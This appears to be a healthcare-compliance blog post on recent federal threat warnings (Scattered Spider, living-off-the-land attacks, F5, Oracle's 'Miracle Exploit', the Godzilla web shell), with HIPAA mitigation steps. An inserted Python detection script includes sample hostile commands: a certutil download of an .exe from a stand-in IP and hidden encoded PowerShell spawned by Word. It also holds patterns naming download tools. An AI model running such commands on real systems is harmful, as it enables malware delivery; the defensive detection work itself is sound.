Serious new cyberthreats to the healthcare sector are looming. Over the past six weeks, federal cybersecurity experts have published detailed warnings about each threat and offered advice on mitigation to defend against them.
The threats include:
- Scattered Spider cybercriminals
- Living-off-the-land (LOTL) attacks
- Exploitation of weaknesses in F5 misconfigurations
- Use of “Miracle Exploit” vulnerabilities in some Oracle software
- Godzilla web shell attacks
Each threat is different and presents unique challenges and responses.
Scattered Spider
Scattered Spider is a financially motivated cybercriminal group that engages in data extortion and other criminal activities. It has been active since at least 2022 and is a native English-speaking group. Experts believe its members are based in the United States and the United Kingdom and are primarily between the ages of 19 and 22 as of September 2023. The group is also known as Octo Tempest, Roasted 0ktapus, Storm-0875, Starfraud, UNC3944, Scatter Swine, and Muddled Libra.
The group is considered an expert in social engineering. Its attacks typically begin with SMS phishing, phone calls to victim help desks, and SIM swapping. After compromising credentials via social engineering, the group impersonates employees in calls to the target organizations’ service desks to secure multifactor authentication (MFA) codes or password resets. By bypassing these security measures, the group has gained access deep inside networks, where it has successfully exfiltrated valuable data and launched ransomware.
Last April, we reported that hackers were using social engineering methods, including voice-based spear-phishing calls to hospital IT help desks. Although those attacks were not linked to a particular group, the tactics overlap with Scattered Spider’s methods and may be related. For more information, see Social Engineering Attacks Targeting IT Help Desks in the Health Sector.
Read the Scattered Spider Analyst Note for more details, including mitigation steps.
Living Off the Land Attacks
These attacks are much harder to detect because they use legitimate software and functions already present on the system being attacked to perform malicious actions on it. Experts warn these attacks are becoming more common.
Using trusted tools, attackers can bypass traditional security measures and disguise their actions as legitimate system processes. These attacks are particularly dangerous for healthcare systems, which rely on a wide range of trusted tools and technologies.
Because these attacks are much more difficult to detect with legacy security tools, they give the attacker more time to escalate privileges, steal data, and plant backdoors for future access. Moreover, this type of attack often uses built-in scripting languages to execute malicious code directly in memory, bypassing traditional antivirus software that primarily scans files on disk. Detecting and mitigating these attacks is therefore extremely challenging for security teams.
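An added detection example (not from the article or the alert it cites) showing how a defender can flag the living-off-the-land patterns described above, such as encoded or hidden PowerShell, trusted binaries used as downloaders, and Office applications spawning script interpreters, in process-creation telemetry. The sample events, field names and indicator list are constructed assumptions modelled on Sysmon-style process-creation logs.

```python
import base64
import re
# Constructed sample process-creation events (Sysmon-style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -enc SQBFAFgA",  # SQBFAFgA is UTF-16LE "IEX"
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/update.txt C:\Users\Public\u.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\Backup-EHR.ps1",  # benign scheduled job
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

# Command-line patterns typical of trusted binaries being driven for malicious ends (assumed list).
LOTL_INDICATORS = [
    ("powershell-encoded", re.compile(r"\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I)),
    ("powershell-hidden", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("powershell-download", re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I)),
    ("certutil-download", re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I)),
]
INTERPRETERS = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = re.search(r"\s-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def assess_event(event):
    """Return the names of every indicator that fires for one event (empty list if none)."""
    cmd, image, parent = (event.get(k, "") for k in ("CommandLine", "Image", "ParentImage"))
    hits = [name for name, rx in LOTL_INDICATORS if rx.search(cmd)]
    # An Office process spawning a script interpreter is the classic macro-to-PowerShell chain.
    if basename(parent) in OFFICE_PARENTS and basename(image) in INTERPRETERS:
        hits.append("office-spawned-interpreter")
    return hits

def scan(events):
    # Yields (index, indicator names, decoded payload or None) for each flagged event.
    return [(i, assess_event(ev), decode_encoded_command(ev.get("CommandLine", "")))
            for i, ev in enumerate(events) if assess_event(ev)]
```

Decoding the encoded command gives the analyst the actual script text to review instead of an opaque blob; in production the indicator list would be tuned against a baseline of the organization's legitimate administrative scripts to keep false positives down.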
Healthcare’s Unique Challenges
- Healthcare organizations often operate in complex, decentralized environments with numerous interconnected systems, which makes it challenging to maintain consistent security measures across the entire network.
- Due to limited resources and budget constraints, many healthcare organizations rely on outdated software. Outdated software and unpatched vulnerabilities make healthcare entities easy targets for cybercriminals.
- Increasing digitization and interconnectivity of medical devices bring new avenues for attack, further increasing the risk to healthcare systems. While this connectivity brings numerous benefits, it also introduces potential vulnerabilities that attackers can exploit to gain control over these life-sustaining devices.
Read the LOTL Alert for more details, including mitigation steps.
F5 Misconfigurations
F5, Inc. is an American technology company that provides hardware and software products and services to large organizations worldwide, including BIG-IP* and services such as cloud computing and application delivery networking (ADN). Its customers include Bank of America, Microsoft, Oracle, Alaska Airlines, Tesla, and Meta. According to Wikipedia, 48 of the Fortune 50 companies are F5 customers.
Large enterprises and governments that rely on F5’s ability to handle high-bandwidth interactions are key targets of both nation-state and cybercrime groups. Consequently, any F5 vulnerability poses a significant security risk for its BIG-IP users and third parties whose personal and financial information may be stored on or processed by a vulnerable device.
*From DevCentral, an online F5 community: BIG-IP is “a collection of hardware platforms and software solutions providing services focused on security, reliability, and performance.”
Read the F5 Analyst Note for more information, including mitigation steps.
Miracle Exploit Vulnerabilities
The “Miracle Exploit” refers to critical vulnerabilities in Oracle products, primarily affecting Oracle Fusion Middleware and its ADF Faces framework, which is used to build web interfaces for Java EE applications.
The vulnerabilities were named the “Miracle Exploit” due to their severity and widespread impact.
The exploit allows attackers to execute remote code without authentication, compromising the system completely, exposing sensitive data, and enabling lateral movement within a network.
Organizations using affected Oracle products were advised to apply patches urgently to avoid exploitation. Cybercriminals could use the exploit as a part of larger attack chains, including deploying ransomware after initial system compromise.
Read the Miracle Exploit Alert for more details, including mitigation steps.
Godzilla Web Shell
The Godzilla “web shell” is a weapon cyber threat actors use to execute commands, manipulate files, and engage in other harmful and malicious activity on victim systems as part of a more extensive cyberattack.
According to the Gigamon blog, “A web shell is an internet-accessible malicious file implanted in a victim web server’s file system that enables an attacker to execute commands by visiting a web page. Once placed on a compromised web server, it allows an attacker to perform remote command execution to the operating system running on the host machine. The web shell provides the attacker with a form of persistence in the compromised system and the potential to further pivot through the network to compromise hosts and data that may not otherwise be externally accessible.”
The Godzilla version has been attributed to Chinese state threat actors and has been used to target various industries, including the health sector. It is publicly available and, therefore, accessible to any number of bad actors, and it should be treated as a serious threat.
Read the Godzilla Analyst Note for more details, including mitigation steps.
Follow the HIPAA Security Rule to Fight Cyber Crime
If you follow the HIPAA Security Rule, you already employ most mitigation steps and recommendations to fight against these newer threats. The HIPAA Security Rule is a blueprint to prevent cybercrime.
Some of the key steps include:
- Install patches and update software immediately after receiving them
- Monitor IT networks for unusual and suspicious activity
- Limit access to authorized staff by function
- Review and upgrade user authentication procedures
- Enhance password protection
- Limit the use of Remote Desktop Protocol (RDP) and other remote desktop services
- Provide workforce cybersecurity awareness training, especially around phishing
If you need to jumpstart your risk analysis, need help with a security risk assessment, or have any other questions about preventing cybercrime intrusions, let us know.